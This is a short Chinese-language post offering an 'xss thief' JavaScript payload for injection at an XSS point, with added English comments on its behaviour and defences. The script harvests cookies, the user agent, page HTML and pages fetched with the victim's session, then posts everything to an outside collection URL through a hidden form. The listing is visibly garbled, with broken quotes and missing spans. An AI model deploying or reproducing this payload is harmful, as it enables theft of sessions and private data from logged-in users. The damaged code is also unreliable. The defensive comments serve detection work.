在黑盒测试的时候,可以偷取后台页面与页面上所有链接页面的HTML源码。
xss thief
在XSS的地方直接引入这个JS就可以了。
// xss thief .. codz by n1nty.
// tested on ie8 firefox 3.6
//test.asp?c=xxxxx
// Configuration and shared state for the collector functions that follow.
// Collection endpoint: xssDoPost() uses this as the action of its hidden form.
var xssCallbackUrl = “http://www.xxxx.com/test.asp”;
// Hostname of the page the script runs in; link following is limited to hrefs on this host.
var xssHost = window.location.hostname;
// Counter appended to "xssFrame" so each POST gets its own hidden iframe name.
var xssIndex = 0;
var xssParseLink = false; // whether links found in the page are also fetched via ajax
// Paths already requested, used by doAjax() to avoid fetching the same path twice.
var xssHandledUrl = new Array();
var xssLinkLimit = 0; // maximum number of links to process; 0 means no limit
// Buffer of fetched link responses waiting to be posted.
var xssLinkHtml = “”;
// Number of links that have been fetched or skipped so far.
var xssLinkDoneCount = 0;
var xssPerPostLinkNum = 5; // number of processed links after which one POST is sent
// NOTE(review): this listing is damaged as extracted. Typographic quotes stand in
// for string delimiters and several spans are missing, so it does not parse as shown.
// The notes below describe only what the visible text establishes.
//
// What the code does (useful when recognising it in a captured payload):
//  - xssHandledUrl.contains(v): membership test over the list of already-seen paths.
//  - xssParseHtml(win): returns win.document.documentElement.innerHTML with the
//    prefix "Html Source :".
//  - xssDoParseLink(win): walks win.document.links. Links whose href starts with
//    "http://" + xssHost and that have no onclick handler are passed to doAjax();
//    all others only increment xssLinkDoneCount.
//  - doAjax(url, total): skips URLs containing "logout", "delete", "del" or "remove",
//    de-duplicates on the last path segment without its query string, then issues an
//    asynchronous same-origin GET (the browser attaches the logged-in user's cookies).
//    Response bodies accumulate in xssLinkHtml and are posted every xssPerPostLinkNum
//    completions, or when the done count equals total.
//  - xssDoPost(data): appends a hidden iframe named "xssFrame" + xssIndex and a hidden
//    form (method POST, action xssCallbackUrl, target that iframe) holding one textarea
//    named "c" with the data, then submits it.
//  - window.onload handler: builds a report from navigator.userAgent, the current time
//    and document.cookie. It adds the name, URL and HTML of each frame of top when
//    running inside a frame, otherwise the HTML of its own window. It posts the report
//    and, if xssParseLink is set, runs xssDoParseLink() on each collected window.
//    Every exception is swallowed by the empty catch.
//
// Defensive relevance:
//  - document.cookie exposes only cookies without the HttpOnly flag, so session cookies
//    should carry it.
//  - HttpOnly does not protect page HTML or same-origin responses, which script in the
//    page can always read. The controls that contain this are output encoding at the
//    injection point and a Content-Security-Policy whose script-src and form-action
//    block the external script load and the off-site form POST.
//  - Indicators visible in this listing: hidden iframe elements with id/name
//    "xssFrame<n>", a POST field named "c" sent to a host other than the application,
//    and a burst of same-origin GETs from one back-office session that avoids
//    logout/delete URLs.
xssHandledUrl.contains = function(v) {
for (var i = 0;i if (this[i] == v) { return true; } } return false; } function xssParseHtml(win) { if (win.document && win.document.documentElement) { var html = win.document.documentElement.innerHTML; return “Html Source :\r\n” + html; } } function xssDoParseLink(win) { var links = win.document.links; var max = (xssLinkLimit == 0) ? links.length : xssLinkLimit; for (var i = 0;i if (links[i].href.indexOf(“http://”+xssHost) == 0 && !links[i].onclick) { doAjax(links[i].href,links.length); } else { xssLinkDoneCount ++; } } } function doAjax(url,total) { var tu = url.toLowerCase(); if (tu.indexOf(“logout”) != -1 || tu.indexOf(“delete”) != -1 || tu.indexOf(“del”) != -1 || tu.indexOf(“remove”) != -1) { xssLinkDoneCount ++; return; } var http = null; var u = url; var start = u.lastIndexOf(“/”); if (u.indexOf(“?”) != -1) { var last = u.indexOf(“?”); u = u.substring(start,last); } else { u = u.substring(start); } if (xssHandledUrl.contains(u)) { xssLinkDoneCount ++; return; } xssHandledUrl.push(u); if (window.XMLHttpRequest) { http = new window.XMLHttpRequest(); } else { http = new ActiveXObject(“microsoft.xmlhttp”); } http.onreadystatechange = function () { if (http.readyState == 4 && http.status == 200) { xssLinkDoneCount ++; xssLinkHtml += “\”"+ url + “\” html source : \r\n”; xssLinkHtml += http.responseText+”\r\n”; if (xssLinkDoneCount % xssPerPostLinkNum == 0) { var tmpHtml = xssLinkHtml; xssLinkHtml = “”; xssDoPost(tmpHtml); } else if (xssLinkDoneCount == total) { xssDoPost(xssLinkHtml); } } } http.open(“GET”,url,true); http.send(); } function xssDoPost(data) { var postFrame. = null; if (window.navigator.userAgent.toLowerCase().indexOf(“msie”) != -1) { postFrame. = document.createElement(“ } else { postFrame. = document.createElement(“iframe”); postFrame.id = “xssFrame”+xssIndex; postFrame.style.display = “none”; postFrame.name = “xssFrame”+xssIndex; } document.body.appendChild(postFrame); var postForm. 
= document.createElement(“form”); postForm.style.display = “none”; postForm.action = xssCallbackUrl; postForm.method = “POST”; postForm.target = “xssFrame”+xssIndex; xssIndex ++; var c = document.createElement(“textarea”); c.name = “c”; if (window.navigator.userAgent.toLowerCase().indexOf(“msie 6″)!=-1) { c.value = escape(data); } else { c.value = data.replace(/&/g,”&”).replace(//g,”>”); } postForm.appendChild(c); document.body.appendChild(postForm); postForm.submit(); } window.onload = function() { try { var wins = new Array(); var str = “——————————————————————————————————-\r\n”; str += “userAgent : “+window.navigator.userAgent + “\r\n”; str += “time : “+new Date() +”\r\n”; str += “Cookie : “+document.cookie +”\r\n”; if (top != window) { str += (top.name?top.name:” var frms = top.frames; for (var i = 0;i str += frms[i].name + “=” + frms[i].location.href+”\r\n”; str += xssParseHtml(frms[i])+”\r\n”; wins.push(frms[i]); } } else { str += (window.name?window.name:” str += xssParseHtml(window) +”\r\n”; wins.push(window); } str += “———————————————————————————————————-\r\n”; xssDoPost(str); if (xssParseLink) { for (var i =0;i xssDoParseLink(wins[i]); } } } catch (e){ } }